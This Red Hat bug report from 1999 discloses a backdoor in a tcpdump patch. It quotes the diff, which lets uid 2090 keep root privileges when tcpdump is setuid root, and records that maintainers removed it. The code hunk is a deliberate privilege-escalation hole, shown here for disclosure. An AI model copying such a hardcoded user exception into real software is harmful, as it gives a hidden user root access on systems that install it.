Bug 7116 - if you have uid 2090 you are a winner if tcpdump is suid root
if you have uid 2090 you are a winner if tcpdump is suid root
Status: CLOSED RAWHIDE
Product: Red Hat Linux
Classification: Retired
Component: tcpdump (Show other bugs)
6.1
All Linux
medium Severity medium
: ---
: ---
Assigned To: Harald Hoyer
: Security
Depends On:
Blocks:
  Show dependency treegraph
 
Reported: 1999-11-18 15:51 EST by lha
Modified: 2008-05-01 11:37 EDT (History)
0 users

See Also:
Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of:
Environment:
Last Closed: 1999-12-22 09:52:05 EST
Type: ---
Regression: ---
Mount Type: ---
Documentation: ---
CRM:
Verified Versions:
Category: ---
oVirt Team: ---
RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: ---


Attachments (Terms of Use)

  None (edit)
Description lha 1999-11-18 15:51:26 EST
tcpdump-3.4-ss990523.dif.gz

if you have uid 2090 you are a winner if tcpdump is suid root,
and people might do that since is a nice thing to tcpdump the network
w/o being root.

You never read patches you get ?

diff -x rsvpd -x rsvp_print.c --new-file -ur lbl/tcpdump-3.4/tcpdump.c
tcpdump-3.4/tcpdump.c
--- lbl/tcpdump-3.4/tcpdump.c   Sun Oct 19 00:50:17 1997
+++ tcpdump-3.4/tcpdump.c       Wed Mar 17 20:46:21 1999
@@ -134,6 +176,9 @@
        u_char *pcap_userdata;
        char ebuf[PCAP_ERRBUF_SIZE];

+       if (geteuid() == 0 && getuid() != 2090)
+               setuid(getuid());
+
        cnt = -1;
        device = NULL;
        infile = NULL;
Comment 1 lha 1999-11-22 09:44:59 EST
ok, it might not been a security bole by itself, but you should still
read you patches you get.

You should consider using www.tcpdump.org instead of old tcpdump 3.4 + random
patches.
Comment 2 Jeff Johnson 1999-12-22 09:51:59 EST
The 2090 backdoor has been removed in tcpdump-3.4-17.

The tcpdump.org offering doesn't seem quite stable yet, but I'll probably
upgrade to that version when a stable release is available.

Note You need to log in before you can comment on or make changes to this bug.